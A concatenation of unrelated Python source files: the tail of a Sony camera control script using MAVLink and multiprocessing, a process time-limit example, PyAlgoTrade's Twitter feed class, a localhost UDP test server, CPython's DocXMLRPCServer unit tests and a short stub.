success = mySonyCam.sendMavlinkMessageForObject( expro, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraAperture( mySonyCam, mav2SonyVals, aper, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamApertureData( aper, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - aper.timestamp) > time_delta):
if (mySonyCam.getSonyApertureData( aper )==True):
aper.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavAper( mySonyCam, aper, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
success = mySonyCam.sendMavlinkMessageForObject( aper, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraFocusData( mySonyCam, mav2SonyVals, focusdata, focusarea, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamFocusData( focusdata, mav2SonyVals )
success = mySonyCam.setSonyCamFocusAreaData( focusarea, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - focusdata.timestamp) > time_delta):
if (mySonyCam.getSonyCamFocusData( focusdata )==True):
focusdata.timestamp = timenow
if ((timenow - focusarea.timestamp) > time_delta):
if (mySonyCam.getSonyCamFocusAreaData( focusarea )==True):
focusarea.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavFocusData( mySonyCam, focusdata, focusarea, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.sendMavlinkMessageForObject( focusdata, ConnID )
success = mySonyCam.sendMavlinkMessageForObject( focusarea, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraIso( mySonyCam, mav2SonyVals, iso, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamISOData( iso, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - iso.timestamp) > time_delta):
if (mySonyCam.getSonyCamISOData( iso )==True):
iso.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavIso( mySonyCam, iso, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.sendMavlinkMessageForObject( iso, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraShutSpd( mySonyCam, mav2SonyVals, shut_sp, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamShutSpdData( shut_sp, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - shut_sp.timestamp) > time_delta):
if (mySonyCam.getSonyCamShutSpdData( shut_sp )==True):
shut_sp.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavShutSpd( mySonyCam, shut_sp, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.sendMavlinkMessageForObject( shut_sp, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaWhiteBala( mySonyCam, mav2SonyVals, whitebal, tm_upd_disable=False, time_delta = 1000 ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
# initialise general program control flags
#
success = False
timenow = 0
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamWhiteBalaData( whitebal, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - whitebal.timestamp) > time_delta):
if (mySonyCam.getSonyCamWhiteBalaData( whitebal )==True):
whitebal.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavWhiteBala( mySonyCam, whitebal, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
success = mySonyCam.sendMavlinkMessageForObject( whitebal, ConnID )
print ('Exiting :', multiprocessing.current_process().name)
def manageAlphaCameraStillCap( mySonyCam, mav2SonyVals, stillcap, tm_upd_disable=False, time_delta = 1000 ):
#
# initialise general program control flags
#
success = False
timenow = 0
# use this if you want to make a daemon proc
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
#
#
# check to see if mavlink wrote something if so write to cam
# and update the update flag to get the mavlink send
#
success = mySonyCam.setSonyCamStillCapModeData( stillcap, mav2SonyVals )
#
# Time enabled reading to poll on time_delta
# when this data is written the mavlink task
# should send it to the GCS via mavlink messages
#
if not (tm_upd_disable == True):
timenow = mySonyCam.my_timestamp()
#
if ((timenow - stillcap.timestamp) > time_delta):
if (mySonyCam.getSonyCamExProData( stillcap )==True):
stillcap.timestamp = timenow
print ('Exiting :', multiprocessing.current_process().name)
def sendMavStillCap( mySonyCam, stillcap, ConnID ):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
success = mySonyCam.sendMavlinkMessageForObject( stillcap, ConnID )
print ('Exiting :', multiprocessing.current_process().name) #
def mavlinkReqGetParamStillCap( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamExProData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamWhiteBala( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamWhiteBalaData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamShutSpd( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamShutSpdData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamIso( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamISOData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamFocus( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamFocusData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamFocusArea( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamFocusAreaData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamAperture( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyApertureData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def mavlinkReqGetParamExPro( mySonyCam, mav2SonyVals, obj ):
if (mySonyCam.getSonyCamExProData( obj )==True):
obj.timestamp = mySonyCam.my_timestamp()
return True
else:
return False
def serviceParamRequests( mySonyCam, mav2SonyVals, stcap, wb, ss, iso, pf, pfa, pa, expro ):
if not (mav2SonyVals.mav_req_all_param == 0):
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamStillCap)) == 0):
if (mavlinkReqGetParamStillCap( mySonyCam, mav2SonyVals, stcap ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamStillCap
# param_ack ?
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamWhiteBala)) == 0):
if (mavlinkReqGetParamWhiteBala( mySonyCam, mav2SonyVals, wb ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamWhiteBala
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamShutSpd)) == 0):
if (mavlinkReqGetParamShutSpd( mySonyCam, mav2SonyVals, ss ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamShutSpd
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamIso)) == 0):
if (mavlinkReqGetParamIso( mySonyCam, mav2SonyVals, iso ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamIso
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamFocus)) == 0):
if (mavlinkReqGetParamFocus( mySonyCam, mav2SonyVals, pf ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamFocus
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamFocusArea)) == 0):
if (mavlinkReqGetParamFocusArea( mySonyCam, mav2SonyVals, pfa ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamFocusArea
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamAperture)) == 0):
if (mavlinkReqGetParamAperture( mySonyCam, mav2SonyVals, pa ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamAperture
if not ((int(mav2SonyVals.mav_req_all_param) & int(mav2SonyVals.ParamExPro)) == 0):
if (mavlinkReqGetParamExPro( mySonyCam, mav2SonyVals, expro ) == True):
mav2SonyVals.mav_req_all_param = mav2SonyVals.mav_req_all_param & ~mav2SonyVals.ParamExPro
def run_process_messages_from_connection(fra, the_connect, sharedObj, redCam=0):
p = multiprocessing.current_process()
print ('Starting:', p.name, p.pid)
fra.process_messages_from_connection( fra, the_connect, sharedObj, redCam )
print ('Exiting :', multiprocessing.current_process().name)
# ================ error handler if the camera fails (powers link on off) ============
# uses https://github.com/mvp/uhubctl
#
def reset_usb_camlink():
p = os.popen('sudo /home/pi/cams/SonyTEST32/uhubctl/uhubctl -l 1-1 -a 0')
time.sleep(2)
p = os.popen('sudo /home/pi/cams/SonyTEST32/uhubctl/uhubctl -l 1-1 -a 1')
#
# ================ signal handlers ==============================
#
#
# from a signal.alarm
#
def raised_signal_handler(a,b):
print("\033[32m ============ Take Picture ==================")
# do the action here
#
# CTL-C
#
def ctlc_handler(signum, frame):
print("Signal Number:", signum, " Frame: ", frame)
#
# CTL-Z
#
def exit_handler(signum, frame):
print('Exiting....')
exit(0)
#
# on getting kill -SIGUSR1
#
def sigusr1_handler(signum, frame):
print("signal hander with a kill -SIGUSR1 (signal.SIGUSR1)")
# what we want to do on that external signal
if __name__ == '__main__':
# Register the alarm signal with our handler: signal.signal(signal.SIGALRM, raised_signal_handler)
signal.signal(signal.SIGALRM, raised_signal_handler)
# to raise this insert this anywhere in code
# signal.alarm(1)
# Register our signal handler with `SIGINT`(CTRL + C)
signal.signal(signal.SIGINT, ctlc_handler)
# Register the exit handler with `SIGTSTP` (Ctrl + Z)
signal.signal(signal.SIGTSTP, exit_handler)
# external signal handler
signal.signal(signal.SIGUSR1, sigusr1_handler)
frame = MAVFrame()
state = False
while (state == False):
try:
cID,state = frame.makeMAVlinkConn()
except Exception as e:
print("Error Trap :: ", e.__class__, " occurred.")
# wait heartbeat
# if it sends another sys id we need to change it
#
state = False
xx = 1
while xx == 1:
m = cID.recv_match(type="HEARTBEAT", blocking=True, timeout=5)
if not (m == None):
if not ( m.autopilot == mavutil.mavlink.MAV_AUTOPILOT_INVALID ):
xx = 2
id = m.get_srcSystem()
if not ( m.get_srcSystem() == frame.DEFAULT_SYS_ID ) :
print("-------- new id found --------")
while (state == False):
try:
cID,state = frame.makeNewMAVlinkConn(id)
except Exception as e:
print("Error Trap :: ", e.__class__, " occurred.")
# default logger
#
multiprocessing.log_to_stderr(logging.DEBUG)
#
# for extra logging use this
# instead
#
# multiprocessing.log_to_stderr()
# logger = multiprocessing.get_logger()
# logger.setLevel(logging.INFO)
#
# create instance of sony alpha cam (new API)
#
mySonyCamNo1 = sonyAlphaNewCamera()
#
# create an instance of common write structure
# from mavlink reader task to the camera
#
gcsWrites2Sony = mavlinkSonyCamWriteVals()
#
# init the objects with camera data
# & set rhw data to be written back to gcs via mavlink
#
#
# Initialise all shared object data between
# camera and mavlink processes
#
expro = mySonyCamNo1.initSonyCamExProData( )
aper = mySonyCamNo1.initSonyApertureData( )
focusdata = mySonyCamNo1.initSonyCamFocusData( )
focusarea = mySonyCamNo1.initSonyCamFocusAreaData( )
iso = mySonyCamNo1.initSonyCamISOData( )
shut_sp = mySonyCamNo1.initSonyCamShutSpdData( )
whitebal = mySonyCamNo1.initSonyCamWhiteBalaData( )
stillcap = mySonyCamNo1.initSonyCamStillCapModeData( )
#
# now set the class to be initialised
#
gcsWrites2Sony.init_class_state()
while True:
run_process_messages_from_connection(frame, cID, gcsWrites2Sony)
#manageAlphaCameraIso(mySonyCamNo1, gcsWrites2Sony, iso)
#exit(10)
#
# run the process managing the camera
#
a = True
while a:
p0 = multiprocessing.Process(name='run_process_mavlink', target=run_process_messages_from_connection, args=(frame, cID, gcsWrites2Sony,))
p0.daemon = True
if not p0.is_alive() == True:
p0.start()
p00 = multiprocessing.Process(name='serviceParamRequests', target=serviceParamRequests, args=(mySonyCamNo1, gcsWrites2Sony, stillcap, whitebal, shut_sp, iso, focusdata, focusarea, expro))
p00.daemon = True
if not p00.is_alive() == True:
p00.start()
p1 = multiprocessing.Process(name='manageAlphaCameraExpro', target=manageAlphaCameraExpro, args=(mySonyCamNo1, gcsWrites2Sony, expro,))
p1.start()
#time.sleep(0.1)
p3 = multiprocessing.Process(name='manageAlphaCameraAperture', target=manageAlphaCameraAperture, args=(mySonyCamNo1, gcsWrites2Sony, aper,))
p3.start()
#time.sleep(0.1)
p5 = multiprocessing.Process(name='manageAlphaCameraFocusData', target=manageAlphaCameraFocusData, args=(mySonyCamNo1, gcsWrites2Sony, focusdata, focusarea,))
p5.start()
#time.sleep(0.1)
p7 = multiprocessing.Process(name='manageAlphaCameraIso', target=manageAlphaCameraIso, args=(mySonyCamNo1, gcsWrites2Sony, iso,))
p7.start()
#time.sleep(0.1)
p9 = multiprocessing.Process(name='manageAlphaCameraShutSpd', target=manageAlphaCameraShutSpd, args=(mySonyCamNo1, gcsWrites2Sony, shut_sp,))
p9.start()
#time.sleep(0.1)
p11 = multiprocessing.Process(name='manageAlphaWhiteBala', target=manageAlphaWhiteBala, args=(mySonyCamNo1, gcsWrites2Sony, whitebal,))
p11.start()
#time.sleep(0.1)
p13 = multiprocessing.Process(name='manageAlphaCameraStillCap', target=manageAlphaCameraStillCap, args=(mySonyCamNo1, gcsWrites2Sony, stillcap,))
p13.start()
#time.sleep(0.1)
if p1 is not None:
p1.join()
if p3 is not None:
p3.join()
if p5 is not None:
p5.join()
if p7 is not None:
p7.join()
if p9 is not None:
p9.join()
if p11 is not None:
p11.join()
if p13 is not None:
p13.join()
p2 = multiprocessing.Process(name='sendMavExpro', target=sendMavExpro, args=(mySonyCamNo1, expro, cID,))
p2.start()
p4 = multiprocessing.Process(name='sendMavAper', target=sendMavAper, args=(mySonyCamNo1, aper, cID,))
p4.start()
p6 = multiprocessing.Process(name='sendMavFocusData', target=sendMavFocusData, args=(mySonyCamNo1, focusdata, focusarea, cID, ))
p6.start()
p8 = multiprocessing.Process(name='sendMavIso', target=sendMavIso, args=(mySonyCamNo1, iso, cID, ))
p8.start()
p10 = multiprocessing.Process(name='sendMavShutSpd', target=sendMavShutSpd, args=(mySonyCamNo1, shut_sp, cID, ))
p10.start()
p12 = multiprocessing.Process(name='sendMavWhiteBala', target=sendMavWhiteBala, args=(mySonyCamNo1, whitebal, cID, ))
p12.start()
p14 = multiprocessing.Process(name='sendMavStillCap', target=sendMavStillCap, args=(mySonyCamNo1, stillcap, cID, ))
p14.start()
if p2 is not None:
p2.join()
if p4 is not None:
p4.join()
if p6 is not None:
p6.join()
if p8 is not None:
p8.join()
if p10 is not None:
p10.join()
if p12 is not None:
p12.join()
if p14 is not None:
p14.join()
#if p0 is not None:
#p0.join()
# if p0.is_alive() == True:
# p0.terminate()
#
# alternative if we want in main to program we can use daemon (procs) as shown here
# we do not wait for daemons to complete
# https://ja.pymotw.com/2/multiprocessing/basics.html
# https://techacademy.jp/magazine/20607
# we could for example put a while loop inside this function and just run continuously in the background, looping as a daemon proc
#
# d = multiprocessing.Process(name='manageAlphaCameraStillCap', target=manageAlphaCameraStillCap, args=(mySonyCamNo1, gcsWrites2Sony, stillcap))
# d.daemon = True
# n = multiprocessing.Process(name='manageAlphaCameraStillCap', target=sendMavStillCap, args=(mySonyCamNo1, shut_sp, ConnID ))
# n.daemon = False
# d.start()
# n.start()
# wait for a process e.g. non-daemon with a timeout of 5 seconds
# n.join(5)
#
# if its still alive and you want to kill it
#
# to check it is n.is_alive()
# if n.is_alive() == True:
# n.terminate()
# print(n.exitcode) # === the exit code from the routine
#
# Release the shared memory
#
del expro
del stillcap
del aper
del focusdata
del focusarea
del shut_sp
del whitebal
|
code_execution_with_time_limit.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import multiprocessing
def run():
import time
i = 1
# Infinite loop
while True:
print(i)
i += 1
time.sleep(1)
if __name__ == '__main__':
p = multiprocessing.Process(target=run)
p.start()
# Wait
p.join(5)
# If the process is still alive, kill it
if p.is_alive():
print("Kill it.")
# Terminate
p.terminate()
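#
# Generalised sketch (hypothetical helper, not part of the original script): the same
# join-with-timeout / terminate pattern wrapped in a reusable function.
#
def run_with_time_limit(target, seconds, *args, **kwargs):
    proc = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
    proc.start()
    proc.join(seconds)       # wait at most `seconds` for the target to finish
    if proc.is_alive():      # still running -> kill it
        proc.terminate()
        proc.join()          # reap the terminated process
        return False         # timed out
    return True              # finished within the limit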
|
feed.py
|
# PyAlgoTrade
#
# Copyright 2011-2014 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import Queue
import threading
import json
from pyalgotrade import observer
import pyalgotrade.logger
import tweepy
from tweepy import streaming
logger = pyalgotrade.logger.getLogger("twitter")
# This listener just pushes data into a queue.
class Listener(streaming.StreamListener):
def __init__(self, queue):
streaming.StreamListener.__init__(self)
self.__queue = queue
def on_connect(self):
logger.info("Connected.")
def on_timeout(self):
logger.error("Timeout.")
def on_data(self, data):
self.__queue.put(data)
return True
def on_error(self, status):
logger.error(status)
return False
# https://dev.twitter.com/docs/streaming-apis/parameters
class TwitterFeed(observer.Subject):
"""Class responsible for connecting to Twitter's public stream API and dispatching events.
Check https://dev.twitter.com/docs/streaming-apis/streams/public for more information.
:param consumerKey: Consumer key.
:type consumerKey: string.
:param consumerSecret: Consumer secret.
:type consumerSecret: string.
:param accessToken: Access token.
:type accessToken: string.
:param accessTokenSecret: Access token secret.
:type accessTokenSecret: string.
:param track: A list of phrases which will be used to determine what Tweets will be delivered
on the stream. A phrase may be one or more terms separated by spaces, and a phrase will match
if all of the terms in the phrase are present in the Tweet, regardless of order and ignoring case.
:type track: list.
:param follow: A list of user IDs, indicating the users whose Tweets should be delivered on the
stream. Following protected users is not supported.
:type follow: list.
:param languages: A list of language IDs as defined in http://tools.ietf.org/html/bcp47.
:type languages: list.
.. note::
* Go to http://dev.twitter.com and create an app. The consumer key and secret will be generated for you after that.
* Create an access token under the "Your access token" section.
* At least **track** or **follow** have to be set.
"""
QUEUE_TIMEOUT = 0.01
MAX_EVENTS_PER_DISPATCH = 50
def __init__(self, consumerKey, consumerSecret, accessToken, accessTokenSecret, track=[], follow=[], languages=[]):
if not isinstance(track, list):
raise Exception("track must be a list")
if not isinstance(follow, list):
raise Exception("follow must be a list")
if not isinstance(languages, list):
raise Exception("languages must be a list")
self.__event = observer.Event()
self.__queue = Queue.Queue()
self.__thread = None
self.__running = False
listener = Listener(self.__queue)
auth = tweepy.OAuthHandler(consumerKey, consumerSecret)
auth.set_access_token(accessToken, accessTokenSecret)
self.__stream = tweepy.Stream(auth, listener)
self.__track = track
self.__follow = follow
self.__languages = languages
def __threadMain(self):
try:
logger.info("Initializing client.")
self.__stream.filter(track=self.__track, follow=self.__follow, languages=self.__languages)
finally:
logger.info("Client finished.")
self.__running = False
def __dispatchImpl(self):
ret = False
try:
nextTweet = json.loads(self.__queue.get(True, TwitterFeed.QUEUE_TIMEOUT))
ret = True
self.__event.emit(nextTweet)
except Queue.Empty:
pass
return ret
def subscribe(self, callback):
"""Subscribe to Twitter events. The event handler will receive a dictionary with the data as defined in:
https://dev.twitter.com/docs/streaming-apis/messages#Public_stream_messages.
"""
return self.__event.subscribe(callback)
def start(self):
if self.__thread is not None:
raise Exception("Already running")
# Start the thread that will run the client.
self.__thread = threading.Thread(target=self.__threadMain)
self.__thread.start()
self.__running = True
def stop(self):
try:
if self.__thread is not None and self.__thread.is_alive():
logger.info("Shutting down client.")
self.__stream.disconnect()
except Exception, e:
logger.error("Error disconnecting stream: %s." % (str(e)))
def join(self):
if self.__thread is not None:
self.__thread.join()
assert(not self.__running)
def eof(self):
return not self.__running
def dispatch(self):
ret = False
dispatched = TwitterFeed.MAX_EVENTS_PER_DISPATCH
while self.__dispatchImpl() and dispatched > 0:
ret = True
dispatched -= 1
return ret
def peekDateTime(self):
return None
def getDispatchPriority(self):
return None
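# Minimal usage sketch (assumptions: real Twitter credentials replace the placeholder
# strings below, and dispatch() is driven manually here rather than by a pyalgotrade strategy).
if __name__ == "__main__":
    def on_tweet(data):
        logger.info("Got tweet: %s" % data.get("text", ""))

    feed = TwitterFeed("consumerKey", "consumerSecret", "accessToken",
                       "accessTokenSecret", track=["python"])
    feed.subscribe(on_tweet)
    feed.start()
    try:
        while not feed.eof():
            feed.dispatch()
    finally:
        feed.stop()
        feed.join()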
|
test_server.py
|
import socket,time
from threading import Thread
import numpy as np
import string
import pickle
import pyautogui
'''
this class generates random numbers and broadcasts them via the UDP protocol to the local network
print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT
print "message:", MESSAGE
'''
class TestServer(object):
UDP_IP = "127.0.0.1"
UDP_PORT = 5005
MESSAGE = "Hello, World!"
SLEEP_TIME = 0.01 # seconds (100 Hz)
def __init__(self):
self.sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
def __dataThreadFunction( self, socket,sleep_time ):
while True:
# Block for input
rand_num = np.random.rand()
self.sock.sendto(str(rand_num).encode(), (self.UDP_IP, self.UDP_PORT))
time.sleep(sleep_time)
def run( self ):
# Create a separate thread for receiving data packets
dataThread = Thread( target = self.__dataThreadFunction, args = (self.sock, self.SLEEP_TIME))
print('Server starts to broadcast data')
dataThread.start()
# this child class replaces the random-number generator and broadcasts the mouse cursor position instead
class TestServerMouse(TestServer):
def __init__(self):
super().__init__()
def __dataThreadFunction( self, socket,sleep_time ):
while True:
#get cursor position with pyautogui
cursor_pos = pyautogui.position()
#prepare dump data
dump_data = pickle.dumps(cursor_pos)
self.sock.sendto(dump_data, (self.UDP_IP, self.UDP_PORT))
time.sleep(sleep_time)
def run(self):
dataThread = Thread( target = self.__dataThreadFunction, args = (self.sock, self.SLEEP_TIME))
print('Server starts to broadcast data')
dataThread.start()
#test function
if __name__ == "__main__":
tsm = TestServerMouse()
tsm.run()
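# Minimal receiver sketch (assumption: run on the same host, in a separate process from
# the server); unpickles the cursor positions that TestServerMouse broadcasts.
def receive_positions(count=5):
    recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    recv_sock.bind((TestServer.UDP_IP, TestServer.UDP_PORT))
    for _ in range(count):
        data, _addr = recv_sock.recvfrom(1024)
        print(pickle.loads(data))  # a pyautogui Point(x=..., y=...)
    recv_sock.close()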
|
test_docxmlrpc.py
|
from xmlrpc.server import DocXMLRPCServer
import http.client
from test import support
import threading
import time
import socket
import unittest
PORT = None
def server(evt, numrequests):
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
global PORT
PORT = serv.socket.getsockname()[1]
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"""This is an XML-RPC server's documentation, but the server can be used by
POSTing to /RPC2. Try self.add, too.""")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.server_close()
PORT = None
evt.set()
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
threading.Thread(target=server, args=(self.evt, 1)).start()
# wait for port to be assigned
n = 1000
while n > 0 and PORT is None:
time.sleep(0.001)
n -= 1
self.client = http.client.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
self.evt.wait()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server throws an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
currently is, I suspect invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_(
b"""<dl><dt><a name="-<lambda>"><strong><lambda></strong></a>(x, y)</dt></dl>"""
in response.read())
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to PEPS
and RFCs with links, and that it linkifies text starting with http or
ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assert_( # This is ugly ... how can it be made better?
b"""<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd><tt>Add two instances together. This follows <a href="http://www.python.org/dev/peps/pep-0008/">PEP008</a>, but has nothing<br>\nto do with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">RFC1952</a>. Case should matter: pEp008 and rFC1952. Things<br>\nthat start with http and ftp should be auto-linked, too:<br>\n<a href="http://google.com">http://google.com</a>.</tt></dd></dl>"""
in response, response)
def test_system_methods(self):
"""Test the precense of three consecutive system.* methods.
This also tests their use of parameter type recognition and the systems
related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assert_(
b"""<dl><dt><a name="-system.methodHelp"><strong>system.methodHelp</strong></a>(method_name)</dt><dd><tt><a href="#-system.methodHelp">system.methodHelp</a>(\'add\') => "Adds two integers together"<br>\n <br>\nReturns a string containing documentation for the specified method.</tt></dd></dl>\n<dl><dt><a name="-system.methodSignature"><strong>system.methodSignature</strong></a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">system.methodSignature</a>(\'add\') => [double, int, int]<br>\n <br>\nReturns a list describing the signature of the method. In the<br>\nabove example, the add method takes two integers as arguments<br>\nand returns a double result.<br>\n <br>\nThis server does NOT support system.methodSignature.</tt></dd></dl>\n<dl><dt><a name="-test_method"><strong>test_method</strong></a>(arg)</dt><dd><tt>Test method\'s docs. This method truly does very little.</tt></dd></dl>""" in response)
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_(b"""Try self.<strong>add</strong>, too.""" in
response.read())
def test_main():
support.run_unittest(DocXMLRPCHTTPGETServer)
if __name__ == '__main__':
test_main()
|
map.py
|
import numpy as np
from multiprocessing import Process, Manager
# bbox = target['bbox']
# bbox = torch.stack([bbox[:, :, 1], bbox[:, :, 0], bbox[:, :, 3], bbox[:, :, 2]],
# dim=-1) # Change yxyx to xyxy
# cls = torch.unsqueeze(target['cls'], dim=-1)
# max_cls = torch.sum(cls > 0, dim=1).max().item()
# target_tensor = torch.cat([bbox, cls], dim=-1)[:, :max_cls, :]
# output = output['detections']
